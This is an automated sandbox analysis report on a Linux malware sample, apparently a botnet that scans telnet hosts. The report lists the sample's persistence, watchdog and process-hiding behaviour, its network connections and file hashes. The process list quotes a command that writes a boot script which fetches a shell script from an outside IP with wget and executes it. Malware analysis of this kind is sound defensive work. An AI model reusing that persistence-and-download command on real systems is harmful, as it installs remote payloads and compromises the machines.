Analysis Overview
SHA256
35cd367a1fb9c6d29e748b51e42ed8ceee321a1f874aafacc4af3e663049234f
Threat Level: Shows suspicious behavior
The file 19991040084.zip was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Modifies Watchdog functionality
Checks mountinfo of local process
Modifies init.d
Modifies systemd
Creates/modifies environment variables
Modifies rc script
Modifies Bash startup script
Changes its process name
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-25 09:23
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-25 09:23
Reported
2024-11-25 09:26
Platform
ubuntu2404-amd64-20240523-en
Max time kernel
148s
Max time network
128s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/sh | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /bin/sh | N/A |
| N/A | N/A | /bin/sh | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
Modifies Watchdog functionality
| Description | Indicator | Process | Target |
| File opened for modification | /dev/watchdog | /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911 | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911 | N/A |
Checks mountinfo of local process
| Description | Indicator | Process | Target |
| File opened for reading | /proc/2671/mountinfo | /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911 | N/A |
Creates/modifies environment variables
| Description | Indicator | Process | Target |
| File opened for modification | /etc/profile | /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911 | N/A |
Modifies init.d
| Description | Indicator | Process | Target |
| File opened for modification | /etc/init.d/system | /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911 | N/A |
| File opened for modification | /etc/init.d/sh | /bin/sh | N/A |
Modifies rc script
| Description | Indicator | Process | Target |
| File opened for modification | /etc/rc.local | /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911 | N/A |
Modifies systemd
| Description | Indicator | Process | Target |
| File opened for modification | /etc/systemd/system/custom.service | /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911 | N/A |
Modifies Bash startup script
| Description | Indicator | Process | Target |
| File opened for modification | /etc/profile | /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911 | N/A |
Changes its process name
| Description | Indicator | Process | Target |
| Changes the process name, possibly in an attempt to hide itself | N/A | /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911 | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/self/status | /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911 | N/A |
| File opened for reading | /proc/1/cgroup | /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911 | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/systemctl | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/mkdir | N/A |
Processes
/tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911
[/tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911]
/bin/sh
[sh -c systemctl enable custom.service >/dev/null 2>&1]
/usr/bin/systemctl
[systemctl enable custom.service]
/bin/sh
[sh -c chmod +x /etc/init.d/system >/dev/null 2>&1]
/usr/bin/chmod
[chmod +x /etc/init.d/system]
/bin/sh
[sh -c ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1]
/usr/bin/ln
[ln -s /etc/init.d/system /etc/rcS.d/S99system]
/bin/sh
[sh -c echo "#!/bin/sh # /etc/init.d/sh case \"$1\" in start) echo 'Starting sh' /bin/sh & wget http://193.143.1.70/ -O /tmp/lol.sh chmod +x /tmp/lol.sh /tmp/lol.sh & ;; stop) echo 'Stopping sh' killall sh ;; restart) $0 stop $0 start ;; *) echo \"Usage: $0 {start|stop|restart}\" exit 1 ;; esac exit 0" > /etc/init.d/sh]
/bin/sh
[sh -c chmod +x /etc/init.d/sh >/dev/null 2>&1]
/usr/bin/chmod
[chmod +x /etc/init.d/sh]
/bin/sh
[sh -c mkdir -p /etc/rc.d >/dev/null 2>&1]
/usr/bin/mkdir
[mkdir -p /etc/rc.d]
/bin/sh
[sh -c ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1]
/usr/bin/ln
[ln -s /etc/init.d/sh /etc/rc.d/S99sh]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| US | 154.216.19.139:199 | tcp | |
| US | 154.216.19.139:199 | tcp | |
| RU | 193.143.1.70:38242 | tcp | |
| SI | 193.95.244.99:23 | tcp | |
| JP | 126.233.138.16:23 | tcp | |
| CA | 65.95.4.51:23 | tcp | |
| US | 38.232.253.146:23 | tcp | |
| CN | 112.37.16.67:23 | tcp | |
| BR | 201.36.21.179:23 | tcp | |
| TN | 197.20.122.193:23 | tcp | |
| US | 65.249.12.62:23 | tcp | |
| DE | 53.84.242.79:23 | tcp | |
| US | 198.243.110.55:23 | tcp | |
| AU | 20.167.42.190:23 | tcp | |
| US | 136.75.38.49:23 | tcp |
Files
/etc/systemd/system/custom.service
| MD5 | 19a440fdac7f578f2fb33719698a082c |
| SHA1 | ebadce21c65d05ad62a324deb39c57aecd3edf2c |
| SHA256 | b176d41b748466f8ba35246c78a1c940f65403b363c086ccd5b5de577a87cf69 |
| SHA512 | 8bdfac90e7235fc35eeec141a1e2145ed4ea5a250b71bdf0cf0e5e5aa59ab6dc004dc08561bd5547c4a4a106138c98950dc2098c905ce785b9b2c0657684d7bb |
/etc/inittab
| MD5 | 3d6b6e1b05ad5d0538ccd8804bcd279b |
| SHA1 | 0fc061b51c225d5bea072c939de05e8a856558bc |
| SHA256 | cab2df9c1c498df29445837610f14ae08d4af98d3acac69b0581c01fe594e3c5 |
| SHA512 | 1957857cffbc0d526eb04e40db166d661b9dc59fc31fb5551f31cd58d270f839ffa2098e81c8555b12e9dbd55ba17df662b14c6441a6389eb9a76082fa401c98 |
/boot/bootcmd
| MD5 | 735cae7d3cbab0f59d95f84790282103 |
| SHA1 | 1cb77931b3097f18988016c9ceba3280a5ccb2ae |
| SHA256 | dfdd4cf729384e4ed52516ab72bd86be286c80f53d4f5b764fd2dd2a2b2c983b |
| SHA512 | 998daa467c4ee63dd41515897728de70cbb9c579ca8b16c26d8e6db5edad53c6dbd6343fb10eda3dbc29b0cb1fa72a9b2653250e9027e6ee02d17726e958bbfe |
/etc/init.d/system
| MD5 | f000251d92c773cc3ee1ca22cf5f0788 |
| SHA1 | e2386fe6a5f29b1e9e5ad5b38928c024f97105e6 |
| SHA256 | 31a77745dd3724a0691a9255738b9c87516868932e3eb992e2afafcd0574a985 |
| SHA512 | 0dad5adaa7742dd208596fefad53ab21c39fbf2cbe5c9958b92170d555d316f0a0b02ec5236311b869aa18e90592e81439a3a229bf1307b5daf87d87c5f493c2 |
/etc/init.d/sh
| MD5 | c5583b6a699f62cb0a004c99842f5c70 |
| SHA1 | b232ef89bf9b36643b5956aaacfd295b9ce2a0a7 |
| SHA256 | 2b03c83558e4af71f3b35408cf668a2ee06931c21adec760952a21a11bc4c59b |
| SHA512 | a9fc1e4c30452a3d100a8ccfbb707d9d323830fbbca90c98d3c126bf943539baaf1fccb04d435a4b627ed7f1bfb1bbd649dab282488d951dde87e097423e154d |
/etc/motd
| MD5 | 2bd9b4be30579e633fc0191aa93df486 |
| SHA1 | 7d63a9bd9662e86666b27c1b50db8e7370c624ff |
| SHA256 | 64dc39f3004dc93c9fc4f1467b4807f2d8e3eb0bfa96b15c19cd8e7d6fa77a1d |
| SHA512 | ae6dd7b39191354cf43cf65e517460d7d4c61b8f5c08e33e6ca3c451dc7cab4de89f33934c89396b80f1aade0a4e2571bd5ae8b76ef80b737d4588703d2814d5 |